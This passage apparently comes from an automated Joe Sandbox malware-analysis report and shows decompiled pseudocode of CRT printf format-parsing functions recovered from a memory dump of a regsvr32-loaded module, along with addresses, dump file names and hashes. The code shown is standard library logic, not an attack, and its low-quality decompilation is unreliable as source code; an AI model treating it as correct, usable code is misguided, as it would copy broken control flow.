				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t204 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t205 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t184 + _t205 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                0x7fef9d3bcbd
                                0x7fef9d3bcc9
                                0x7fef9d3bcd1
                                0x7fef9d3bcd9
                                0x7fef9d3bcdd
                                0x7fef9d3bce5
                                0x7fef9d3bced
                                0x7fef9d3bd02
                                0x7fef9d3bd11
                                0x7fef9d3bd1b
                                0x7fef9d3bd25
                                0x7fef9d3bd2f
                                0x7fef9d3bd39
                                0x7fef9d3bd3b
                                0x7fef9d3bd44
                                0x7fef9d3bd48
                                0x7fef9d3bd51
                                0x7fef9d3bd55
                                0x7fef9d3bd5e
                                0x7fef9d3bd62
                                0x7fef9d3bd68
                                0x7fef9d3bd70
                                0x7fef9d3bd79
                                0x7fef9d3bd8d
                                0x7fef9d3bd8f
                                0x7fef9d3bd9c
                                0x7fef9d3bda5
                                0x7fef9d3bdae
                                0x7fef9d3bdb8
                                0x7fef9d3bdbc
                                0x7fef9d3bdd1
                                0x7fef9d3bdda
                                0x7fef9d3bdf2
                                0x7fef9d3bdf4
                                0x7fef9d3be01
                                0x7fef9d3be0a
                                0x7fef9d3be0c
                                0x7fef9d3be14
                                0x7fef9d3be29
                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-192189897
                                • Opcode ID: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                • Instruction ID: aadf3acbccf6ff41cc1b37cb3268d324d4900ab85ae7fa80aabce8c8f65e01df
                                • Opcode Fuzzy Hash: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                • Instruction Fuzzy Hash: 13414C72A0D6C28AE3B0DB24E8547BEB7E4E385345F600126D6D987AA9DB7DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DC6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t204 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t205 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t184 + _t205 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                0x7fef9d3dc6b
                                0x7fef9d3dc77
                                0x7fef9d3dc7f
                                0x7fef9d3dc87
                                0x7fef9d3dc8b
                                0x7fef9d3dc93
                                0x7fef9d3dc9b
                                0x7fef9d3dcb0
                                0x7fef9d3dcbf
                                0x7fef9d3dcc9
                                0x7fef9d3dcd3
                                0x7fef9d3dcdd
                                0x7fef9d3dce7
                                0x7fef9d3dce9
                                0x7fef9d3dcf2
                                0x7fef9d3dcf6
                                0x7fef9d3dcff
                                0x7fef9d3dd03
                                0x7fef9d3dd0c
                                0x7fef9d3dd10
                                0x7fef9d3dd16
                                0x7fef9d3dd1e
                                0x7fef9d3dd27
                                0x7fef9d3dd3b
                                0x7fef9d3dd3d
                                0x7fef9d3dd4a
                                0x7fef9d3dd53
                                0x7fef9d3dd5c
                                0x7fef9d3dd66
                                0x7fef9d3dd6a
                                0x7fef9d3dd7f
                                0x7fef9d3dd88
                                0x7fef9d3dda0
                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                • Instruction ID: e7137eedf57618a3e563147601a49a8da4cfcefd457897bce2b88a2abc432a47
                                • Opcode Fuzzy Hash: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                • Instruction Fuzzy Hash: 7E411CB2A0C6C18AE7B0CB64E8447BEB7E0F384349F600125E6D987AA9D77DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DC41 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                Download Yara Rule
                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
				void* _t190;
				char* _t210;
				char* _t211;

				_a76 = 1;
				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t210 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t210);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t190 + _t210 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t211 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t211);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t190 + _t211 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                0x7fef9d3dc41
                                0x7fef9d3dc61
                                0x7fef9d3dc6b
                                0x7fef9d3dc77
                                0x7fef9d3dc7f
                                0x7fef9d3dc87
                                0x7fef9d3dc8b
                                0x7fef9d3dc93
                                0x7fef9d3dc9b
                                0x7fef9d3dcb0
                                0x7fef9d3dcbf
                                0x7fef9d3dcc9
                                0x7fef9d3dcd3
                                0x7fef9d3dcdd
                                0x7fef9d3dce7
                                0x7fef9d3dce9
                                0x7fef9d3dcf2
                                0x7fef9d3dcf6
                                0x7fef9d3dcff
                                0x7fef9d3dd03
                                0x7fef9d3dd0c
                                0x7fef9d3dd10
                                0x7fef9d3dd16
                                0x7fef9d3dd1e
                                0x7fef9d3dd27
                                0x7fef9d3dd3b
                                0x7fef9d3dd3d
                                0x7fef9d3dd4a
                                0x7fef9d3dd53
                                0x7fef9d3dd5c
                                0x7fef9d3dd66
                                0x7fef9d3dd6a
                                0x7fef9d3dd7f
                                0x7fef9d3dd88
                                0x7fef9d3dda0
                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                • Instruction ID: fc8006ff6f8d7d76551d502993a9577a4ed4fa9ca6386b0b138cfffaa104f198
                                • Opcode Fuzzy Hash: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                • Instruction Fuzzy Hash: 48412BB2A0C6C286E7F09B64E8407BE72E4F38434AF600126D6C9875A9DB3ED444CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BDDA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t134 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t114 + _t134 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                0x7fef9d3bdda
                                0x7fef9d3bdf2
                                0x7fef9d3bdf4
                                0x7fef9d3be01
                                0x7fef9d3be0a
                                0x7fef9d3be0c
                                0x7fef9d3be14
                                0x7fef9d3be29
                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-192189897
                                • Opcode ID: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                • Instruction ID: 4b3f24e3fb7174c937380b25a7ddf4328f53ddd6ef2afac6cc97801a46cd3647
                                • Opcode Fuzzy Hash: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                • Instruction Fuzzy Hash: 41416E72A0DAC28AE3F0DB24E8547BEB7E4E385345F600126D6DD869A9DB7ED141CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DD88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t134 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t114 + _t134 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                0x7fef9d3dd88
                                0x7fef9d3dda0
